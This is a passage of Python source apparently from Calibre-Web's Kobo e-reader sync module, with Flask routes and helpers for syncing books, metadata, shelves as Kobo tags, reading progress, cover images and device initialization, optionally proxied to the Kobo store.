ts_created = max(ts_created, book.date_added)
except AttributeError:
pass
if ts_created > sync_token.books_last_created:
sync_results.append({"NewEntitlement": entitlement})
else:
sync_results.append({"ChangedEntitlement": entitlement})
new_books_last_modified = max(
book.Books.last_modified, new_books_last_modified
)
try:
new_books_last_modified = max(
new_books_last_modified, book.date_added
)
except AttributeError:
pass
new_books_last_created = max(ts_created, new_books_last_created)
if sqlalchemy_version2:
max_change = calibre_db.session.execute(changed_entries
.filter(ub.ArchivedBook.is_archived)
.order_by(func.datetime(ub.ArchivedBook.last_modified).desc()))\
.columns(db.Books).first()
else:
max_change = changed_entries.from_self().filter(ub.ArchivedBook.is_archived) \
.order_by(func.datetime(ub.ArchivedBook.last_modified).desc()).first()
max_change = max_change.last_modified if max_change else new_archived_last_modified
new_archived_last_modified = max(new_archived_last_modified, max_change)
# no. of books returned
if sqlalchemy_version2:
entries = calibre_db.session.execute(changed_entries).all()
book_count = len(entries)
else:
#entries = changed_entries.all()
book_count = changed_entries.count()
# last entry:
# sync_cont = entries[-1].Books.id or -1 if book_count else -1
log.debug("Remaining books to Sync: {}".format(book_count))
# generate reading state data
changed_reading_states = ub.session.query(ub.KoboReadingState)
if only_kobo_shelves:
changed_reading_states = changed_reading_states.join(ub.BookShelf,
ub.KoboReadingState.book_id == ub.BookShelf.book_id)\
.join(ub.Shelf)\
.filter(current_user.id == ub.Shelf.user_id)\
.filter(ub.Shelf.kobo_sync,
or_(
func.datetime(ub.KoboReadingState.last_modified) > sync_token.reading_state_last_modified,
func.datetime(ub.BookShelf.date_added) > sync_token.books_last_modified
)).distinct()
else:
changed_reading_states = changed_reading_states.filter(
func.datetime(ub.KoboReadingState.last_modified) > sync_token.reading_state_last_modified)
changed_reading_states = changed_reading_states.filter(
and_(ub.KoboReadingState.user_id == current_user.id,
ub.KoboReadingState.book_id.notin_(reading_states_in_new_entitlements)))
for kobo_reading_state in changed_reading_states.all():
book = calibre_db.session.query(db.Books).filter(db.Books.id == kobo_reading_state.book_id).one_or_none()
if book:
sync_results.append({
"ChangedReadingState": {
"ReadingState": get_kobo_reading_state_response(book, kobo_reading_state)
}
})
new_reading_state_last_modified = max(new_reading_state_last_modified, kobo_reading_state.last_modified)
sync_shelves(sync_token, sync_results, only_kobo_shelves)
sync_token.books_last_created = new_books_last_created
sync_token.books_last_modified = new_books_last_modified
sync_token.archive_last_modified = new_archived_last_modified
sync_token.reading_state_last_modified = new_reading_state_last_modified
# sync_token.books_last_id = books_last_id
return generate_sync_response(sync_token, sync_results, book_count)
def generate_sync_response(sync_token, sync_results, set_cont=False):
    """Wrap *sync_results* in a JSON response carrying Kobo sync headers.

    When the Kobo store proxy is enabled, merges the official store's sync
    results and forwards its x-kobo-* headers. ``set_cont`` (truthy, e.g. a
    remaining-book count from the caller) sets "x-kobo-sync: continue" so
    the device immediately requests another sync round. Mutates
    *sync_token* via ``merge_from_store_response`` and serializes it into
    the response headers.
    """
    extra_headers = {}
    if config.config_kobo_proxy:
        # Merge in sync results from the official Kobo store.
        try:
            store_response = make_request_to_kobo_store(sync_token)

            store_sync_results = store_response.json()
            sync_results += store_sync_results
            sync_token.merge_from_store_response(store_response)
            extra_headers["x-kobo-sync"] = store_response.headers.get("x-kobo-sync")
            extra_headers["x-kobo-sync-mode"] = store_response.headers.get("x-kobo-sync-mode")
            extra_headers["x-kobo-recent-reads"] = store_response.headers.get("x-kobo-recent-reads")
        except Exception as ex:
            # Best effort: a store failure must not break the local sync.
            log.error("Failed to receive or parse response from Kobo's sync endpoint: {}".format(ex))
    if set_cont:
        extra_headers["x-kobo-sync"] = "continue"
    sync_token.to_headers(extra_headers)

    # log.debug("Kobo Sync Content: {}".format(sync_results))
    response = make_response(jsonify(sync_results), extra_headers)
    return response
@kobo.route("/v1/library/<book_uuid>/metadata")
@requires_kobo_auth
@download_required
def HandleMetadataRequest(book_uuid):
    """Serve the Kobo metadata payload for the book identified by *book_uuid*."""
    if not current_app.wsgi_app.is_proxied:
        log.debug('Kobo: Received unproxied request, changed request port to external server port')
    log.info("Kobo library metadata request received for book %s" % book_uuid)
    book = calibre_db.get_book_by_uuid(book_uuid)
    # Unknown books are handed to the Kobo store proxy (or a redirect).
    if book and book.data:
        return jsonify([get_metadata(book)])
    log.info(u"Book %s not found in database", book_uuid)
    return redirect_or_proxy_request()
def get_download_url_for_book(book, book_format):
    """Build the URL a Kobo device should fetch *book* from.

    Unproxied installations get an absolute URL on the configured external
    port; proxied installations use the regular Flask route.
    """
    fmt_lower = book_format.lower()
    if not current_app.wsgi_app.is_proxied:
        # Drop the port from the Host header unless it ends a bare IPv6 literal.
        host = request.host
        if ':' in host and not host.endswith(']'):
            host = "".join(host.split(':')[:-1])
        return "{url_scheme}://{url_base}:{url_port}/kobo/{auth_token}/download/{book_id}/{book_format}".format(
            url_scheme=request.scheme,
            url_base=host,
            url_port=config.config_external_port,
            auth_token=get_auth_token(),
            book_id=book.id,
            book_format=fmt_lower
        )
    return url_for(
        "kobo.download_book",
        auth_token=kobo_auth.get_auth_token(),
        book_id=book.id,
        book_format=fmt_lower,
        _external=True,
    )
def create_book_entitlement(book, archived):
    """Build the Kobo "BookEntitlement" dict for *book*.

    ``archived`` marks the entitlement as removed on the device. The book's
    uuid doubles as Id, CrossRevisionId, and RevisionId.
    """
    book_uuid = book.uuid
    return {
        "Accessibility": "Full",
        "ActivePeriod": {"From": convert_to_kobo_timestamp_string(datetime.datetime.now())},
        "Created": convert_to_kobo_timestamp_string(book.timestamp),
        "CrossRevisionId": book_uuid,
        "Id": book_uuid,
        "IsRemoved": archived,
        "IsHiddenFromArchive": False,
        "IsLocked": False,
        "LastModified": convert_to_kobo_timestamp_string(book.last_modified),
        "OriginCategory": "Imported",
        "RevisionId": book_uuid,
        "Status": "Active",
    }
def current_time():
    """Return the current UTC time as a Kobo-style ISO-8601 string ("...Z")."""
    now_utc = gmtime()
    return strftime("%Y-%m-%dT%H:%M:%SZ", now_utc)
def get_description(book):
    """Return the text of *book*'s first comment, or None when it has none."""
    comments = book.comments
    if comments:
        return comments[0].text
    return None
# TODO handle multiple authors
def get_author(book):
    """Build the Kobo contributor fields for *book*'s author(s).

    Note the upstream quirk this preserves: with a single author,
    "Contributors" is a bare string; with several it is a list.
    """
    authors = book.authors
    if not authors:
        return {"Contributors": None}
    if len(authors) > 1:
        roles = [{"Name": author.name, "Role": "Author"} for author in authors]
        names = [author.name for author in authors]
        return {"ContributorRoles": roles, "Contributors": names}
    sole_author = authors[0].name
    return {"ContributorRoles": [{"Name": sole_author, "Role": "Author"}], "Contributors": sole_author}
def get_publisher(book):
    """Return the name of *book*'s first publisher, or None when unset."""
    publishers = book.publishers
    return publishers[0].name if publishers else None
def get_series(book):
    """Return the name of the first series *book* belongs to, or None."""
    series = book.series
    return series[0].name if series else None
def get_seriesindex(book):
    """Return *book*'s position within its series, defaulting to 1 when falsy."""
    index = book.series_index
    return index if index else 1
def get_metadata(book):
    """Build the Kobo "BookMetadata" payload for *book*.

    Prefers a KEPUB rendition for download links when one exists, then maps
    the book's bibliographic data onto the fields Kobo devices expect.
    """
    download_urls = []
    # Offer only the KEPUB file when one is stored; otherwise every format.
    kepub = [data for data in book.data if data.format == 'KEPUB']
    for book_data in kepub if len(kepub) > 0 else book.data:
        if book_data.format not in KOBO_FORMATS:
            continue
        for kobo_format in KOBO_FORMATS[book_data.format]:
            # log.debug('Id: %s, Format: %s' % (book.id, kobo_format))
            download_urls.append(
                {
                    "Format": kobo_format,
                    "Size": book_data.uncompressed_size,
                    "Url": get_download_url_for_book(book, book_data.format),
                    # The Kobo format accepts platforms: (Generic, Android)
                    "Platform": "Generic",
                    # "DrmType": "None", # Not required
                }
            )
    book_uuid = book.uuid
    metadata = {
        "Categories": ["00000000-0000-0000-0000-000000000001", ],
        # "Contributors": get_author(book),
        "CoverImageId": book_uuid,
        "CrossRevisionId": book_uuid,
        "CurrentDisplayPrice": {"CurrencyCode": "USD", "TotalAmount": 0},
        "CurrentLoveDisplayPrice": {"TotalAmount": 0},
        "Description": get_description(book),
        "DownloadUrls": download_urls,
        "EntitlementId": book_uuid,
        "ExternalIds": [],
        "Genre": "00000000-0000-0000-0000-000000000001",
        "IsEligibleForKoboLove": False,
        "IsInternetArchive": False,
        "IsPreOrder": False,
        "IsSocialEnabled": True,
        "Language": "en",
        "PhoneticPronunciations": {},
        # TODO: Fix book.pubdate to return a datetime object so that we can easily
        # convert it to the format Kobo devices expect.
        "PublicationDate": book.pubdate,
        "Publisher": {"Imprint": "", "Name": get_publisher(book),},
        "RevisionId": book_uuid,
        "Title": book.title,
        "WorkId": book_uuid,
    }
    # The author fields come back as a dict ("Contributors"/"ContributorRoles").
    metadata.update(get_author(book))
    if get_series(book):
        # Python 2 needs a byte string for uuid3; Python 3 takes str directly.
        if sys.version_info < (3, 0):
            name = get_series(book).encode("utf-8")
        else:
            name = get_series(book)
        metadata["Series"] = {
            "Name": get_series(book),
            "Number": get_seriesindex(book),  # ToDo Check int() ?
            "NumberFloat": float(get_seriesindex(book)),
            # Get a deterministic id based on the series name.
            "Id": uuid.uuid3(uuid.NAMESPACE_DNS, name),
        }
    return metadata
@kobo.route("/v1/library/tags", methods=["POST", "DELETE"])
@requires_kobo_auth
# Creates a Shelf with the given items, and returns the shelf's uuid.
def HandleTagCreate():
    """Create a CalibreWeb shelf from a Kobo "tag" (collection) request.

    Returns the new shelf's uuid with HTTP 201. Aborts with 405 for
    DELETE, 400 on a malformed payload, and 401 when the user may not
    edit an existing shelf of the same name.
    """
    # catch delete requests, otherwise they are handled in the book delete handler
    if request.method == "DELETE":
        abort(405)
    name, items = None, None
    try:
        shelf_request = request.json
        name = shelf_request["Name"]
        items = shelf_request["Items"]
        if not name:
            raise TypeError
    except (KeyError, TypeError):
        log.debug("Received malformed v1/library/tags request.")
        abort(400, description="Malformed tags POST request. Data has empty 'Name', missing 'Name' or 'Items' field")

    shelf = ub.session.query(ub.Shelf).filter(ub.Shelf.name == name, ub.Shelf.user_id ==
                                              current_user.id).one_or_none()
    if shelf and not shelf_lib.check_shelf_edit_permissions(shelf):
        # Fix: error message previously misspelled "unauthaurized".
        abort(401, description="User is unauthorized to create shelf.")

    if not shelf:
        shelf = ub.Shelf(user_id=current_user.id, name=name, uuid=str(uuid.uuid4()))
        ub.session.add(shelf)

    items_unknown_to_calibre = add_items_to_shelf(items, shelf)
    if items_unknown_to_calibre:
        log.debug("Received request to add unknown books to a collection. Silently ignoring items.")
    ub.session_commit()

    return make_response(jsonify(str(shelf.uuid)), 201)
@kobo.route("/v1/library/tags/<tag_id>", methods=["DELETE", "PUT"])
@requires_kobo_auth
def HandleTagUpdate(tag_id):
    """Rename (PUT) or delete (DELETE) the shelf matching Kobo tag *tag_id*.

    Unknown collections are proxied to the Kobo store when proxying is
    enabled, otherwise answered with 404. 401 when the user lacks edit
    permission; 400 on a malformed rename payload.
    """
    shelf = ub.session.query(ub.Shelf).filter(ub.Shelf.uuid == tag_id,
                                              ub.Shelf.user_id == current_user.id).one_or_none()
    if not shelf:
        log.debug("Received Kobo tag update request on a collection unknown to CalibreWeb")
        if config.config_kobo_proxy:
            return redirect_or_proxy_request()
        else:
            abort(404, description="Collection isn't known to CalibreWeb")

    if not shelf_lib.check_shelf_edit_permissions(shelf):
        # Fix: error message previously misspelled "unauthaurized".
        abort(401, description="User is unauthorized to edit shelf.")

    if request.method == "DELETE":
        shelf_lib.delete_shelf_helper(shelf)
    else:
        name = None
        try:
            shelf_request = request.json
            name = shelf_request["Name"]
        except (KeyError, TypeError):
            log.debug("Received malformed v1/library/tags rename request.")
            abort(400, description="Malformed tags POST request. Data is missing 'Name' field")

        shelf.name = name
        ub.session.merge(shelf)
        ub.session_commit()
    return make_response(' ', 200)
# Adds items to the given shelf.
def add_items_to_shelf(items, shelf):
    """Append the given Kobo tag items to *shelf*; return the unrecognized ones."""
    existing_ids = {entry.book_id for entry in shelf.books}
    unknown_items = []
    for item in items:
        try:
            if item["Type"] != "ProductRevisionTagItem":
                unknown_items.append(item)
                continue
            book = calibre_db.get_book_by_uuid(item["RevisionId"])
            if not book:
                unknown_items.append(item)
                continue
            # Skip books already linked to the shelf.
            if book.id not in existing_ids:
                shelf.books.append(ub.BookShelf(book_id=book.id))
        except KeyError:
            unknown_items.append(item)
    return unknown_items
@kobo.route("/v1/library/tags/<tag_id>/items", methods=["POST"])
@requires_kobo_auth
def HandleTagAddItem(tag_id):
    """Add books to the shelf matching Kobo tag *tag_id*.

    Aborts 400 on a malformed payload, 404 for unknown collections, and
    401 when the user may not edit the shelf. Unknown books are skipped.
    """
    items = None
    try:
        tag_request = request.json
        items = tag_request["Items"]
    except (KeyError, TypeError):
        log.debug("Received malformed v1/library/tags/<tag_id>/items/delete request.")
        abort(400, description="Malformed tags POST request. Data is missing 'Items' field")

    shelf = ub.session.query(ub.Shelf).filter(ub.Shelf.uuid == tag_id,
                                              ub.Shelf.user_id == current_user.id).one_or_none()
    if not shelf:
        log.debug("Received Kobo request on a collection unknown to CalibreWeb")
        abort(404, description="Collection isn't known to CalibreWeb")

    if not shelf_lib.check_shelf_edit_permissions(shelf):
        # Fix: error message previously misspelled "unauthaurized".
        abort(401, description="User is unauthorized to edit shelf.")

    items_unknown_to_calibre = add_items_to_shelf(items, shelf)
    if items_unknown_to_calibre:
        log.debug("Received request to add an unknown book to a collection. Silently ignoring item.")

    ub.session.merge(shelf)
    ub.session_commit()
    return make_response('', 201)
@kobo.route("/v1/library/tags/<tag_id>/items/delete", methods=["POST"])
@requires_kobo_auth
def HandleTagRemoveItem(tag_id):
    """Remove books from the shelf matching Kobo tag *tag_id*.

    Aborts 400 on a malformed payload, 404 for unknown collections, and
    401 when the user may not edit the shelf. Unknown books are skipped
    and reported only in the debug log.
    """
    items = None
    try:
        tag_request = request.json
        items = tag_request["Items"]
    except (KeyError, TypeError):
        log.debug("Received malformed v1/library/tags/<tag_id>/items/delete request.")
        abort(400, description="Malformed tags POST request. Data is missing 'Items' field")

    shelf = ub.session.query(ub.Shelf).filter(ub.Shelf.uuid == tag_id,
                                              ub.Shelf.user_id == current_user.id).one_or_none()
    if not shelf:
        log.debug(
            "Received a request to remove an item from a Collection unknown to CalibreWeb.")
        abort(404, description="Collection isn't known to CalibreWeb")

    if not shelf_lib.check_shelf_edit_permissions(shelf):
        # Fix: error message previously misspelled "unauthaurized".
        abort(401, description="User is unauthorized to edit shelf.")

    items_unknown_to_calibre = []
    for item in items:
        try:
            if item["Type"] != "ProductRevisionTagItem":
                items_unknown_to_calibre.append(item)
                continue
            book = calibre_db.get_book_by_uuid(item["RevisionId"])
            if not book:
                items_unknown_to_calibre.append(item)
                continue
            shelf.books.filter(ub.BookShelf.book_id == book.id).delete()
        except KeyError:
            items_unknown_to_calibre.append(item)
    ub.session_commit()

    if items_unknown_to_calibre:
        # Fix: log message previously read "remove an unknown book to a collecition".
        log.debug("Received request to remove an unknown book from a collection. Silently ignoring item.")
    return make_response('', 200)
# Add new, changed, or deleted shelves to the sync_results.
# Note: Public shelves that aren't owned by the user aren't supported.
def sync_shelves(sync_token, sync_results, only_kobo_shelves=False):
    """Append shelf ("tag") changes since the last sync to *sync_results*.

    Emits DeletedTag entries for archived shelves (and, when
    ``only_kobo_shelves`` is set, for shelves excluded from Kobo sync),
    then NewTag/ChangedTag entries for created or modified shelves.
    Advances ``sync_token.tags_last_modified`` and commits as side effects.
    """
    new_tags_last_modified = sync_token.tags_last_modified

    # Shelves the user deleted since the last sync.
    for shelf in ub.session.query(ub.ShelfArchive).filter(
        func.datetime(ub.ShelfArchive.last_modified) > sync_token.tags_last_modified,
        ub.ShelfArchive.user_id == current_user.id
    ):
        new_tags_last_modified = max(shelf.last_modified, new_tags_last_modified)
        sync_results.append({
            "DeletedTag": {
                "Tag": {
                    "Id": shelf.uuid,
                    "LastModified": convert_to_kobo_timestamp_string(shelf.last_modified)
                }
            }
        })

    extra_filters = []
    if only_kobo_shelves:
        # BUG FIX: this filter previously used `not ub.Shelf.kobo_sync`, which
        # applies Python truthiness to the column object instead of emitting
        # SQL NOT; compare explicitly so SQLAlchemy builds the right clause.
        for shelf in ub.session.query(ub.Shelf).filter(
            func.datetime(ub.Shelf.last_modified) > sync_token.tags_last_modified,
            ub.Shelf.user_id == current_user.id,
            ub.Shelf.kobo_sync == False  # noqa: E712 - SQLAlchemy needs the comparison
        ):
            sync_results.append({
                "DeletedTag": {
                    "Tag": {
                        "Id": shelf.uuid,
                        "LastModified": convert_to_kobo_timestamp_string(shelf.last_modified)
                    }
                }
            })
        extra_filters.append(ub.Shelf.kobo_sync)

    if sqlalchemy_version2:
        shelflist = ub.session.execute(select(ub.Shelf).outerjoin(ub.BookShelf).filter(
            or_(func.datetime(ub.Shelf.last_modified) > sync_token.tags_last_modified,
                func.datetime(ub.BookShelf.date_added) > sync_token.tags_last_modified),
            ub.Shelf.user_id == current_user.id,
            *extra_filters
        ).distinct().order_by(func.datetime(ub.Shelf.last_modified).asc())).columns(ub.Shelf)
    else:
        shelflist = ub.session.query(ub.Shelf).outerjoin(ub.BookShelf).filter(
            or_(func.datetime(ub.Shelf.last_modified) > sync_token.tags_last_modified,
                func.datetime(ub.BookShelf.date_added) > sync_token.tags_last_modified),
            ub.Shelf.user_id == current_user.id,
            *extra_filters
        ).distinct().order_by(func.datetime(ub.Shelf.last_modified).asc())

    for shelf in shelflist:
        if not shelf_lib.check_shelf_view_permissions(shelf):
            continue
        new_tags_last_modified = max(shelf.last_modified, new_tags_last_modified)
        tag = create_kobo_tag(shelf)
        if not tag:
            continue
        # Shelves created after the last sync are new; the rest changed.
        if shelf.created > sync_token.tags_last_modified:
            sync_results.append({
                "NewTag": tag
            })
        else:
            sync_results.append({
                "ChangedTag": tag
            })
    sync_token.tags_last_modified = new_tags_last_modified
    ub.session_commit()
# Creates a Kobo "Tag" object from a ub.Shelf object
def create_kobo_tag(shelf):
    """Serialize *shelf* into Kobo's {"Tag": ...} wrapper, skipping unknown books."""
    tag_items = []
    for book_shelf in shelf.books:
        book = calibre_db.get_book(book_shelf.book_id)
        if not book:
            log.info(u"Book (id: %s) in BookShelf (id: %s) not found in book database", book_shelf.book_id, shelf.id)
            continue
        tag_items.append(
            {
                "RevisionId": book.uuid,
                "Type": "ProductRevisionTagItem"
            }
        )
    return {"Tag": {
        "Created": convert_to_kobo_timestamp_string(shelf.created),
        "Id": shelf.uuid,
        "Items": tag_items,
        "LastModified": convert_to_kobo_timestamp_string(shelf.last_modified),
        "Name": shelf.name,
        "Type": "UserTag"
    }}
@kobo.route("/v1/library/<book_uuid>/state", methods=["GET", "PUT"])
@requires_kobo_auth
def HandleStateRequest(book_uuid):
    """Read (GET) or update (PUT) the Kobo reading state for one book.

    PUT payloads carry a "ReadingStates" list whose first entry may update
    the current bookmark, the reading statistics, and the read status.
    Malformed payloads roll the session back and abort with HTTP 400.
    """
    book = calibre_db.get_book_by_uuid(book_uuid)
    if not book or not book.data:
        log.info(u"Book %s not found in database", book_uuid)
        return redirect_or_proxy_request()

    kobo_reading_state = get_or_create_reading_state(book.id)

    if request.method == "GET":
        return jsonify([get_kobo_reading_state_response(book, kobo_reading_state)])
    else:
        update_results_response = {"EntitlementId": book_uuid}

        try:
            request_data = request.json
            request_reading_state = request_data["ReadingStates"][0]

            request_bookmark = request_reading_state["CurrentBookmark"]
            if request_bookmark:
                current_bookmark = kobo_reading_state.current_bookmark
                current_bookmark.progress_percent = request_bookmark["ProgressPercent"]
                current_bookmark.content_source_progress_percent = request_bookmark["ContentSourceProgressPercent"]
                location = request_bookmark["Location"]
                if location:
                    current_bookmark.location_value = location["Value"]
                    current_bookmark.location_type = location["Type"]
                    current_bookmark.location_source = location["Source"]
                update_results_response["CurrentBookmarkResult"] = {"Result": "Success"}

            request_statistics = request_reading_state["Statistics"]
            if request_statistics:
                statistics = kobo_reading_state.statistics
                statistics.spent_reading_minutes = int(request_statistics["SpentReadingMinutes"])
                statistics.remaining_time_minutes = int(request_statistics["RemainingTimeMinutes"])
                update_results_response["StatisticsResult"] = {"Result": "Success"}

            request_status_info = request_reading_state["StatusInfo"]
            if request_status_info:
                book_read = kobo_reading_state.book_read_link
                new_book_read_status = get_ub_read_status(request_status_info["Status"])
                # Transitioning into "Reading" bumps the started-reading
                # counter and timestamp before the status is stored.
                if new_book_read_status == ub.ReadBook.STATUS_IN_PROGRESS \
                        and new_book_read_status != book_read.read_status:
                    book_read.times_started_reading += 1
                    book_read.last_time_started_reading = datetime.datetime.utcnow()
                book_read.read_status = new_book_read_status
                update_results_response["StatusInfoResult"] = {"Result": "Success"}
        except (KeyError, TypeError, ValueError, StatementError):
            log.debug("Received malformed v1/library/<book_uuid>/state request.")
            ub.session.rollback()
            abort(400, description="Malformed request data is missing 'ReadingStates' key")

        ub.session.merge(kobo_reading_state)
        ub.session_commit()
        return jsonify({
            "RequestResult": "Success",
            "UpdateResults": [update_results_response],
        })
def get_read_status_for_kobo(ub_book_read):
    """Translate a ub.ReadBook status into Kobo's status string.

    Raises KeyError for status values outside the known set.
    """
    kobo_statuses = {
        None: "ReadyToRead",
        ub.ReadBook.STATUS_UNREAD: "ReadyToRead",
        ub.ReadBook.STATUS_FINISHED: "Finished",
        ub.ReadBook.STATUS_IN_PROGRESS: "Reading",
    }
    return kobo_statuses[ub_book_read.read_status]
def get_ub_read_status(kobo_read_status):
    """Translate a Kobo status string back into the ub.ReadBook constant.

    Raises KeyError for strings outside the known set.
    """
    ub_statuses = {
        None: None,
        "ReadyToRead": ub.ReadBook.STATUS_UNREAD,
        "Finished": ub.ReadBook.STATUS_FINISHED,
        "Reading": ub.ReadBook.STATUS_IN_PROGRESS,
    }
    return ub_statuses[kobo_read_status]
def add_synced_books(book_id):
    """Record that *book_id* has been synced to the current user's device."""
    entry = ub.KoboSyncedBooks()
    entry.user_id = current_user.id
    entry.book_id = book_id
    ub.session.add(entry)
    try:
        ub.session.commit()
    except Exception:
        # Best effort: e.g. a duplicate record just keeps the existing row.
        ub.session.rollback()
def get_or_create_reading_state(book_id):
    """Fetch the current user's Kobo reading state for *book_id*, creating it on demand."""
    book_read = ub.session.query(ub.ReadBook).filter(ub.ReadBook.book_id == book_id,
                                                     ub.ReadBook.user_id == current_user.id).one_or_none()
    if book_read is None:
        book_read = ub.ReadBook(user_id=current_user.id, book_id=book_id)
    if not book_read.kobo_reading_state:
        # First contact from a Kobo device: seed bookmark and statistics rows.
        reading_state = ub.KoboReadingState(user_id=book_read.user_id, book_id=book_id)
        reading_state.current_bookmark = ub.KoboBookmark()
        reading_state.statistics = ub.KoboStatistics()
        book_read.kobo_reading_state = reading_state
    ub.session.add(book_read)
    ub.session_commit()
    return book_read.kobo_reading_state
def get_kobo_reading_state_response(book, kobo_reading_state):
    """Build the Kobo "ReadingState" payload for *book* from the stored state."""
    return {
        "EntitlementId": book.uuid,
        "Created": convert_to_kobo_timestamp_string(book.timestamp),
        "LastModified": convert_to_kobo_timestamp_string(kobo_reading_state.last_modified),
        # AFAICT PriorityTimestamp is always equal to LastModified.
        "PriorityTimestamp": convert_to_kobo_timestamp_string(kobo_reading_state.priority_timestamp),
        "StatusInfo": get_status_info_response(kobo_reading_state.book_read_link),
        "Statistics": get_statistics_response(kobo_reading_state.statistics),
        "CurrentBookmark": get_current_bookmark_response(kobo_reading_state.current_bookmark),
    }
def get_status_info_response(book_read):
    """Build the Kobo StatusInfo payload from a ub.ReadBook row."""
    resp = {
        "LastModified": convert_to_kobo_timestamp_string(book_read.last_modified),
        "Status": get_read_status_for_kobo(book_read),
        "TimesStartedReading": book_read.times_started_reading,
    }
    last_started = book_read.last_time_started_reading
    if last_started:
        resp["LastTimeStartedReading"] = convert_to_kobo_timestamp_string(last_started)
    return resp
def get_statistics_response(statistics):
    """Build the Kobo Statistics payload, omitting unset (falsy) fields."""
    resp = {"LastModified": convert_to_kobo_timestamp_string(statistics.last_modified)}
    for key, value in (("SpentReadingMinutes", statistics.spent_reading_minutes),
                       ("RemainingTimeMinutes", statistics.remaining_time_minutes)):
        if value:
            resp[key] = value
    return resp
def get_current_bookmark_response(current_bookmark):
    """Build the Kobo CurrentBookmark payload, omitting unset (falsy) fields."""
    resp = {"LastModified": convert_to_kobo_timestamp_string(current_bookmark.last_modified)}
    if current_bookmark.progress_percent:
        resp["ProgressPercent"] = current_bookmark.progress_percent
    if current_bookmark.content_source_progress_percent:
        resp["ContentSourceProgressPercent"] = current_bookmark.content_source_progress_percent
    # A location is only meaningful when a value has been stored.
    if current_bookmark.location_value:
        resp["Location"] = {
            "Value": current_bookmark.location_value,
            "Type": current_bookmark.location_type,
            "Source": current_bookmark.location_source,
        }
    return resp
@kobo.route("/<book_uuid>/<width>/<height>/<isGreyscale>/image.jpg", defaults={'Quality': ""})
@kobo.route("/<book_uuid>/<width>/<height>/<Quality>/<isGreyscale>/image.jpg")
@requires_kobo_auth
def HandleCoverImageRequest(book_uuid, width, height, Quality, isGreyscale):
    """Serve the cover image for *book_uuid*.

    Unknown covers are redirected to the Kobo image host when proxying is
    enabled, otherwise answered with an empty JSON body. The width/height/
    Quality/isGreyscale parameters are accepted for URL compatibility but
    not applied here.
    """
    book_cover = helper.get_book_cover_with_uuid(
        book_uuid, use_generic_cover_on_failure=False
    )
    if not book_cover:
        if config.config_kobo_proxy:
            log.debug("Cover for unknown book: %s proxied to kobo" % book_uuid)
            # 307 keeps the device's request method on the redirect.
            return redirect(KOBO_IMAGEHOST_URL +
                            "/{book_uuid}/{width}/{height}/false/image.jpg".format(book_uuid=book_uuid,
                                                                                   width=width,
                                                                                   height=height), 307)
        else:
            log.debug("Cover for unknown book: %s requested" % book_uuid)
            # additional proxy request make no sense, -> direct return
            return make_response(jsonify({}))
    log.debug("Cover request received for book %s" % book_uuid)
    return book_cover
@kobo.route("")
def TopLevelEndpoint():
    """Answer the Kobo root probe with an empty JSON object."""
    return make_response(jsonify({}))
@kobo.route("/v1/library/<book_uuid>", methods=["DELETE"])
@requires_kobo_auth
def HandleBookDeletionRequest(book_uuid):
    """Handle a Kobo delete by archiving the book for the current user."""
    log.info("Kobo book deletion request received for book %s" % book_uuid)
    book = calibre_db.get_book_by_uuid(book_uuid)
    if not book:
        log.info(u"Book %s not found in database", book_uuid)
        return redirect_or_proxy_request()

    existing = (
        ub.session.query(ub.ArchivedBook)
        .filter(ub.ArchivedBook.book_id == book.id)
        .first()
    )
    archived_book = existing or ub.ArchivedBook(user_id=current_user.id, book_id=book.id)
    archived_book.is_archived = True
    archived_book.last_modified = datetime.datetime.utcnow()

    ub.session.merge(archived_book)
    ub.session_commit()
    return ("", 204)
# TODO: Implement the following routes
@kobo.route("/v1/library/<dummy>", methods=["DELETE", "GET"])
def HandleUnimplementedRequest(dummy=None):
    """Log and proxy/redirect library routes CalibreWeb does not implement."""
    log.debug("Unimplemented Library Request received: %s", request.base_url)
    return redirect_or_proxy_request()
# TODO: Implement the following routes
@kobo.route("/v1/user/loyalty/<dummy>", methods=["GET", "POST"])
@kobo.route("/v1/user/profile", methods=["GET", "POST"])
@kobo.route("/v1/user/wishlist", methods=["GET", "POST"])
@kobo.route("/v1/user/recommendations", methods=["GET", "POST"])
@kobo.route("/v1/analytics/<dummy>", methods=["GET", "POST"])
def HandleUserRequest(dummy=None):
    """Log and proxy/redirect user/analytics routes CalibreWeb does not implement."""
    log.debug("Unimplemented User Request received: %s", request.base_url)
    return redirect_or_proxy_request()
@kobo.route("/v1/products/<dummy>/prices", methods=["GET", "POST"])
@kobo.route("/v1/products/<dummy>/recommendations", methods=["GET", "POST"])
@kobo.route("/v1/products/<dummy>/nextread", methods=["GET", "POST"])
@kobo.route("/v1/products/<dummy>/reviews", methods=["GET", "POST"])
@kobo.route("/v1/products/books/external/<dummy>", methods=["GET", "POST"])
@kobo.route("/v1/products/books/series/<dummy>", methods=["GET", "POST"])
@kobo.route("/v1/products/books/<dummy>", methods=["GET", "POST"])
@kobo.route("/v1/products/dailydeal", methods=["GET", "POST"])
@kobo.route("/v1/products", methods=["GET", "POST"])
def HandleProductsRequest(dummy=None):
    """Log and proxy/redirect store product routes CalibreWeb does not implement."""
    log.debug("Unimplemented Products Request received: %s", request.base_url)
    return redirect_or_proxy_request()
def make_calibre_web_auth_response():
    """Return a dummy auth/device payload that satisfies the Kobo device.

    As described in kobo_auth.py, CalibreWeb makes no practical use of this
    auth/device API call for authentication (nor for authorization), so the
    tokens are just random bytes.
    """
    content = request.get_json()
    access_token = base64.b64encode(os.urandom(24)).decode('utf-8')
    refresh_token = base64.b64encode(os.urandom(24)).decode('utf-8')
    payload = {
        "AccessToken": access_token,
        "RefreshToken": refresh_token,
        "TokenType": "Bearer",
        "TrackingId": str(uuid.uuid4()),
        "UserKey": content['UserKey'],
    }
    return make_response(jsonify(payload))
@kobo.route("/v1/auth/device", methods=["POST"])
@requires_kobo_auth
def HandleAuthRequest():
    """Answer a device auth request, proxying to Kobo when configured."""
    log.debug('Kobo Auth request')
    if config.config_kobo_proxy:
        try:
            return redirect_or_proxy_request()
        except Exception:
            log.error("Failed to receive or parse response from Kobo's auth endpoint. Falling back to un-proxied mode.")
    # Proxy disabled or unreachable: hand back a locally generated token.
    return make_calibre_web_auth_response()
@kobo.route("/v1/initialization")
@requires_kobo_auth
def HandleInitRequest():
    """Serve the Kobo initialization resource table.

    Starts from the official store's resources when proxying is enabled
    (falling back to the built-in NATIVE_KOBO_RESOURCES on failure), then
    rewrites the image host and cover-URL templates so the device fetches
    covers from this CalibreWeb instance.
    """
    log.info('Init')
    kobo_resources = None
    if config.config_kobo_proxy:
        try:
            store_response = make_request_to_kobo_store()

            store_response_json = store_response.json()
            if "Resources" in store_response_json:
                kobo_resources = store_response_json["Resources"]
        except Exception:
